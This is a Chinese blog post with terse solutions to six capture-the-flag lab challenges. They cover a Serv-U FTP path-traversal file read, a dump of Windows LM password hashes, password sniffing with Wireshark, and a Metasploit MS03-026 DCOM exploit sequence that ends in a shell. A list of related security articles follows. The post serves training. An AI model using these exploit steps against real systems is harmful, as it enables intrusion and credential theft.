CTF

最新推荐文章于 2024-05-15 09:16:34 发布
最新推荐文章于 2024-05-15 09:16:34 发布
阅读量4.4k 收藏 7
点赞数 1
分类专栏: 自己的菜地 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zb0567/article/details/80585996
版权

题目1:FTP服务器漏洞

目标系统通过Serv-U搭建了一个FTP服务。请尝试利用软件的漏洞获取目标服务器系统的FLAG.txt文件内的flag值并提交。

1、利用serv-u的漏洞,ftp ip,匿名登录,用户名anonymous,密码无

2、get ..:/windows/system/flag.txt 1.txt

题目2:获取windows本地密码

获取Windows管理员密码的hash值,并把LM hash值作为key值提交;

提示:Windows 本地密码通过LM、以及NTLM俩种加密方式保存;请提交LM 哈希值。

备注:

在线模式:请直接使用渗透机winxp做题即可

独享模式:获取网络靶机IP地址后,请通过远程桌面“mstsc”连接后做题,用户名:administrator密码123456

1\进入c:\tools 点击获取密码 cmd.exe  输入pass.exe $local 500后面那一串

题目3:通过网络嗅探获取Password

某攻击者已经利用漏洞进入某系统的内网,为进一步扩大战果,通过网络嗅探等方式,获取目标系统的密码(password)等敏感信息,请将获取的password值作为key值提交。

1、ping目标主机,然后apr -a查看目标主机的mac地址。

2、打开抓包软件wireshark针对目标主机进行抓包,选择菜单中的Capture——>Options——>Capture Filter——>UDP only——>ok——>Start

3、查找到对应目标地址即可

题目4:通过系统漏洞获取敏感文件内容

你需要利用软件找到目标系统的漏洞,并结合一定的软件利用相应的漏洞获取目标系统的文件及文件中的信息。请利用漏洞获取目标系统key.txt文件,并将其内容作为key值提交

(本题60分)

startx

https://localhost:8834  addexception

confirm secrity exception

scantemp==new scan==设置name和target为目标,run 查看到ms03-026 823980

backtrack ==exploitationtools==networkexploitationtools==metasploit framework==msfconsole

稍等 search ms03_026 

use 上面的路径 exploi。。。。dcom

show options

set rhost ip

set rport 135

exploit

shell

c盘根目录下查看,结束

题目5:服务器木马查杀

 已知目标服务器被攻击,并植入了木马。你作为管理员在发现这个问题之后,当务之急需要登录到服务器当中,在不知道是什么木马的情况下,尽快的查到到木马并清除。

提示:key值隐藏在木马的注册表键值中

备注:

在线模式:获取网络靶机IP地址后,利用渗透攻击机winxp远程桌面“mstsc”连接后做题,用户名:administrator密码123456

独享模式:获取网络靶机IP地址后,请通过远程桌面“mstsc”连接后做题,用户名:administrator密码123456

查看进程,发现kernel32.exe开销不正常,结束, 搜索注册表,发现key Iamvirus

题目6:针对东方科技的渗透测试

东方科技公司是一个拥有很多\\\\\\\\\\\\\\\'黑科技\\\\\\\\\\\\\\\'的公司,而最重要的数据都保存在数据库中,所以请获取其数据库中的敏感信息

点击网络靶机获取IP地址后,用渗透机浏览器访问http://获取到的IP地址/1/


zb0567
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
中科磐云——网络空间安全抓包题目 B.pcap
Jay
07-15 1153
1.通过分析虚拟机windows7桌面上的数据包B.pcapng,到数据库里的flag最后一个字符是什么,将该字符作为FLAG提交;5.通过分析数据包B.pcapng,到黑客通过一句话木马上传的第一个文件是什么,将文件名作为FLAG提交;3.通过分析数据包B.pcapng,到服务器的内核版本是多少,将该版本信息作为FLAG提交;4.通过分析数据包B.pcapng,到黑客扫描网段的命令是什么?6.通过分析数据包B.pcapng,到黑客从服务器上下载的文件,将文件内容作为FLAG提交。...
CTF-pwn上的一次远程本地链接
半岛铁盒的博客
04-29 798
命令ssh -p 29662 CTFMan@node3.buuoj.cn 常规命令 ssh user@192.168.1.100 这里 -p的作用是: 一般ssh定义的端口号是22,若是有所改动就用-p + 改动的端口号
2024年最新CTF利用大佬们的webshell拿取flag_ctf留言板获取flag(1),Golang系统面试题
最新发布
2401_84924864的博客
05-15 460
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。但唯一发现了一个zb.php无疑是个webshell。本来想把图片下载下来,看看一些大佬上传的图片马密码。需要的话可以点击**
操作系统漏洞检测与利用
weixin_44756468的博客
09-23 8834
一、什么是漏洞 1、漏洞漏洞”也称脆弱性,指系统存在的设计缺陷、错误或不合理之处。漏洞在生活中很常见,如游戏漏洞、刷钻漏洞、Windows漏洞等。 漏洞是一种软件攻击代码缺陷,这种缺陷大多数情况下不会影响用户的正常使用,但是一旦被恶意攻击者利用,就会对软件自身或软件的用户带来危害。如信息系统被攻击或控制,重要资料被窃取,用户数据被纂改,系统被作为入侵其他主机系统的跳板。从目前发现的漏洞来看,应用软件中的漏洞远远多于操作系统中的漏洞,特别是WEB应用系统中的漏洞更是占信息系统漏洞的绝大多数。 2、系统
渗透面试题
热门推荐
China_C_boss的博客
01-18 6万+
思路流程 信息收集 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文...
CTF题目
weixin_45912028的博客
11-29 798
第一题:直接粘贴 第二题:用记事本打开 第三题:百度搜数字 第四题:用记事本打开,再用base64解密 第五题:下载下来点开图片,按F12点击source 第六题:一个二维码与题中的图片用画图粘贴扫码 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本...
ctf拼图例题-puzzle
04-13
CTF(Capture The Flag)竞赛中,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的图片,很可能是参赛者需要解读的线索。每个图片可能代表一个...
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
CTF之二维码扫描.7z
12-02
在网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,旨在锻炼和测试参与者的信息安全技能。这个"CTF之二维码扫描.7z"压缩包显然与CTF比赛中的一个环节有关,即二维码扫描。二维码在现代生活中无处不在,...
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
内网渗透一:利用Xss漏洞进入内网
xysoul的专栏
05-02 8106
0x01:科普 Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配 0x01:科普 Beef目前欧美最流行的WEB框架攻击平台,全称:
史上最全网络安全面试题总结
03-17 2万+
新的一年,难免有不少小伙伴面临跳槽或者工作,本文总结了常见的安全岗位面试题,方便各位复习。祝各位事业顺利,财运亨通。 php爆绝对路径方法? 单引号引起数据库报错 访问错误参数或错误路径 探针类文件如phpinfo 扫描开发未删除的测试文件 google hacking phpmyadmin报路径:/phpmyadmin/libraries/lect_lang.lib.php 利用漏洞读取配置文件路径 恶意使用网站功能,如本地图片读取功能读取不存在图片,上传点上传不能正常导入的文件 你常用的渗
CTF大赛模拟-CFS三层内网漫游
m0_62970186的博客
04-05 4988
文章目录CTF大赛模拟-CFS三层内网漫游环境:外网打点tp漏洞利用52网段主机发现sql注入72网段主机发现验证ms17010 CTF大赛模拟-CFS三层内网漫游 环境: 三台虚拟机,三个网络。 target 1:192.168.161.178 ,192.168.52.132 (linux) target 2:192.168.52.133, 192.168.72.131 (linux) target 3: 192.168.72.132 (win7) 攻击者只能与target 1进行通讯 外网打点 访
关于服务器被入侵+植入病毒木马
不会飞的鱼、
11-02 1323
近期项目中遇到了几个棘手的问题,海外服务器被植入木马WK程序。之前一直听说xxx的服务器被入侵被黑,这次实打实遇到,还是没有做好安全防护策略,看了下应该是通过redis无密码漏洞渗透进来,9月14日早晨,客服侧反馈xxx系统从早晨6点半开始无法收到告警和工单,排查xxx相关网元服务都正常运维,内存,磁盘使用率占用正常,其中cpu使用率较高,存在异常情况。随机展开排查。
漏洞利用篇(上)
m0_57929980的博客
06-16 6920
漏洞利用篇:介绍漏洞利用的基本概念及示例,主要讲解Shellcode的编写与编码
CTF命令执行
qq_45086218的博客
03-02 2655
文章目录通配符*号?号常用命令其他姿势 本文以ctf.show网站题目为例,总结ctf中的命令执行姿势 通配符 if(!preg_match("/flag/i", $c)){ eval($c); } *号 c=system('cat *.php'); c=system('cat f*'); ?号 c=system('cat fla?????'); c=system('cat f?????hp'); 常用命令 system() passthru() exec() shell_e
搭建CTF比赛平台
飞花的世界
08-12 9444
http://123.206.21.163 这个是我按照 这个人的代码,修改后的。说实话,这个平台写的很精简,也很棒。代码啥的也很舒服,可惜就是没文档,所以最开始的时候,花了我两天时间大致阅读完了,知道哪一比分怎么改,干嘛的。上面的网址是效果。 接下来放他的github地址 PS 下面有演示图片,但是因为是异步加载图片,所以有点慢,等下就好。这个比赛平台做的真的挺好的 https://git...
网站漏洞之“敏感目录” 与 “敏感文件” 处理
梁吉林的博客
05-23 9394
今天公司的官网被扫出了漏洞,好吧,那就解决掉它们。 敏感目录 在访问host/download/请求时,返回403 Forbidden: Forbidden You don’t have permission to access /download/ on this server. Additionally, a 404 Not Found error was enco...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值